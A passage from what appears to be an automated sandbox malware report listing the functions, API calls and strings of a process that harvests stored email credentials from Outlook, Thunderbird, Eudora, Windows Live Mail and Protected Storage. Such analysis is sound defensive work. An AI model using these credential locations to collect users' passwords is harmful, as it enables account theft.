33983->33985 33984->33985 33986 44b374 ??3@YAXPAX 33985->33986 33987 44b37b 33985->33987 33986->33987 34115 426741 21 API calls 34116 40c5c3 123 API calls 34118 43fdc5 17 API calls 34303 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34121 4161cb memcpy memcpy memcpy memcpy 34307 44b3cf 750 API calls 34309 43ffc8 18 API calls 34122 4281cc 15 API calls __fprintf_l 34311 4383cc 110 API calls __fprintf_l 34123 4275d3 41 API calls 34312 4153d3 22 API calls __fprintf_l 34124 444dd7 _XcptFilter 34317 4013de 15 API calls 34319 425115 111 API calls __fprintf_l 34320 43f7db 18 API calls 34323 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34126 4335ee 16 API calls __fprintf_l 34325 429fef 11 API calls 34127 444deb _exit _c_exit 34326 40bbf0 133 API calls 34130 425115 79 API calls __fprintf_l 34330 437ffa 22 API calls 34134 4021ff 14 API calls 34135 43f5fc 149 API calls 34331 40e381 9 API calls 34137 405983 40 API calls 34138 42b186 27 API calls __fprintf_l 34139 427d86 76 API calls 34140 403585 20 API calls 34142 42e58e 18 API calls __fprintf_l 34145 425115 75 API calls __fprintf_l 34147 401592 8 API calls 33186 410b92 33189 410a6b 33186->33189 33188 410bb2 33190 410a77 33189->33190 33191 410a89 GetPrivateProfileIntA 33189->33191 33194 410983 memset _itoa WritePrivateProfileStringA 33190->33194 33191->33188 33193 410a84 33193->33188 33194->33193 34335 434395 16 API calls 34149 441d9c memcmp 34337 43f79b 119 API calls 34150 40c599 42 API calls 34338 426741 87 API calls 34154 4401a6 21 API calls 34156 426da6 memcpy memset memset memcpy 34157 4335a5 15 API calls 34159 4299ab memset memset memcpy memset memset 34160 40b1ab 8 API calls 34343 425115 76 API calls __fprintf_l 34347 4113b2 18 API calls 2 library calls 34351 40a3b8 memset sprintf SendMessageA 33961 410bbc 33964 4109cf 33961->33964 33965 4109dc 33964->33965 33966 410a23 memset GetPrivateProfileStringA 33965->33966 33967 4109ea memset 33965->33967 33972 407646 strlen 33966->33972 33977 4075cd sprintf memcpy 33967->33977 33970 410a0c WritePrivateProfileStringA 33971 410a65 33970->33971 33973 40765a 33972->33973 33975 40765c 33972->33975 33973->33971 33974 4076a3 33974->33971 33975->33974 33978 40737c strtoul 33975->33978 33977->33970 33978->33975 34162 40b5bf memset memset _mbsicmp

                                                                                                    Executed Functions

                                                                                                    Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 132 408484-408488 130->132 133 408455-40845e 130->133 134 408422-40842b 131->134 135 408460-408464 133->135 136 408465-408482 133->136 137 408432-40844e 134->137 138 40842d-408431 134->138 135->136 136->132 136->133 137->130 137->134 138->137
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040832F
                                                                                                    • memset.MSVCRT ref: 00408343
                                                                                                    • memset.MSVCRT ref: 0040835F
                                                                                                    • memset.MSVCRT ref: 00408376
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                    • strlen.MSVCRT ref: 004083E9
                                                                                                    • strlen.MSVCRT ref: 004083F8
                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                    • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                    • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                    Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 328 407ef8-407f01 329 407f03-407f22 FindFirstFileA 328->329 330 407f24-407f38 FindNextFileA 328->330 331 407f3f-407f44 329->331 332 407f46-407f74 strlen * 2 330->332 333 407f3a call 407f90 330->333 331->332 335 407f89-407f8f 331->335 336 407f83 332->336 337 407f76-407f81 call 4070e3 332->337 333->331 339 407f86-407f88 336->339 337->339 339->335
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                                                    • strlen.MSVCRT ref: 00407F64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                    • String ID: ACD
                                                                                                    • API String ID: 379999529-620537770
                                                                                                    • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                    • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                    Function 00401E69 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 261stringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00401E8B
                                                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                                                    • strlen.MSVCRT ref: 00401F06
                                                                                                    • memset.MSVCRT ref: 00401FB1
                                                                                                    • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                    • memset.MSVCRT ref: 00402003
                                                                                                    • sprintf.MSVCRT ref: 00402030
                                                                                                    • memset.MSVCRT ref: 00402086
                                                                                                    • memset.MSVCRT ref: 0040209B
                                                                                                    • strlen.MSVCRT ref: 004020A1
                                                                                                    • strlen.MSVCRT ref: 004020AF
                                                                                                    • strlen.MSVCRT ref: 004020E2
                                                                                                    • strlen.MSVCRT ref: 004020F0
                                                                                                    • memset.MSVCRT ref: 00402018
                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                    • API String ID: 3833278029-4223776976
                                                                                                    • Opcode ID: 2483929f5450403f9d2d181702c6e3d7bb7f9175a7d0ec4a9f9a3206454d5b49
                                                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                    • Opcode Fuzzy Hash: 2483929f5450403f9d2d181702c6e3d7bb7f9175a7d0ec4a9f9a3206454d5b49
                                                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                    Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
                                                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
                                                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                    • API String ID: 745651260-375988210
                                                                                                    • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                    • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                    Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                    • pstorec.dll, xrefs: 00403C30
                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                    • API String ID: 1197458902-317895162
                                                                                                    • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                    • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                    Function 0044B49F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                    • String ID: h4ND
                                                                                                    • API String ID: 3662548030-3825183422
                                                                                                    • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                    • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                    • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                    • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                                                    Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044430B
                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                    • memset.MSVCRT ref: 00444379
                                                                                                    • memset.MSVCRT ref: 00444394
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                    • strlen.MSVCRT ref: 004443DB
                                                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                                                    Strings
                                                                                                    • Store Root, xrefs: 004443A5
                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                    • API String ID: 3203569119-2578778931
                                                                                                    • Opcode ID: 084e1bc9afca8c0106b47a78fe7cf29dd96ddef5f2ad11b86a5d00e222a1a2d5
                                                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                    • Opcode Fuzzy Hash: 084e1bc9afca8c0106b47a78fe7cf29dd96ddef5f2ad11b86a5d00e222a1a2d5
                                                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                    Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 283 40ccd7-40cd06 ??2@YAPAXI@Z 284 40cd08-40cd0d 283->284 285 40cd0f 283->285 286 40cd11-40cd24 ??2@YAPAXI@Z 284->286 285->286 287 40cd26-40cd2d call 404025 286->287 288 40cd2f 286->288 290 40cd31-40cd57 287->290 288->290 292 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 290->292 293 40cd59-40cd60 DeleteObject 290->293 293->292
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                    • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                    • memset.MSVCRT ref: 0040CD96
                                                                                                    • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2054149589-0
                                                                                                    • Opcode ID: 3122acd30c0617eacb2afd047b7a336f9301861a29c926e86494a36dd5557137
                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                    • Opcode Fuzzy Hash: 3122acd30c0617eacb2afd047b7a336f9301861a29c926e86494a36dd5557137
                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                    Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 300 40ba28-40ba3a 301 40ba87-40ba9b call 406c62 300->301 302 40ba3c-40ba52 call 407e20 _mbsicmp 300->302 324 40ba9d call 4107f1 301->324 325 40ba9d call 404734 301->325 326 40ba9d call 404785 301->326 327 40ba9d call 403c16 301->327 307 40ba54-40ba6d call 407e20 302->307 308 40ba7b-40ba85 302->308 314 40ba74 307->314 315 40ba6f-40ba72 307->315 308->301 308->302 309 40baa0-40bab3 call 407e30 316 40bab5-40bac1 309->316 317 40bafa-40bb09 SetCursor 309->317 318 40ba75-40ba76 call 40b5e5 314->318 315->318 319 40bac3-40bace 316->319 320 40bad8-40baf7 qsort 316->320 318->308 319->320 320->317 324->309 325->309 326->309 327->309
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 882979914-1578091866
                                                                                                    • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                    • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                    Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004109F7
                                                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                    • memset.MSVCRT ref: 00410A32
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3143880245-0
                                                                                                    • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                    • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                    Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 351 44b33b-44b342 352 44b344-44b34a ??3@YAXPAX@Z 351->352 353 44b34b-44b352 351->353 352->353 354 44b354-44b35a ??3@YAXPAX@Z 353->354 355 44b35b-44b362 353->355 354->355 356 44b364-44b36a ??3@YAXPAX@Z 355->356 357 44b36b-44b372 355->357 356->357 358 44b374-44b37a ??3@YAXPAX@Z 357->358 359 44b37b 357->359 358->359
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                    Function 00410DBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
